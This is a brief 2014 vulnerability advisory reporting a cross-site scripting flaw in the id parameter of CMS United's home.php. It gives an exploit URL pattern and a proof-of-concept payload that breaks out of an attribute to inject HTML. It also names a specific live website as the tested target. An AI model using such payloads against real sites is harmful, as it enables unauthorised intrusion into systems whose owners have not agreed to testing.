# Cross Site Scripting on CMS United
# Risk: Low
# CWE number: CWE-79
# Date: 09/04/2014
# Vendor: www.cmsunited.com
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: /home.php
# Exploit: http://host/home.php?id=[xss]
# PoC: 

      - Target: www.ralphvanmanen.nl
      - Vuln. File: /home.php?id=
      - Exploit: "><marquee>Vulnerable</marquee>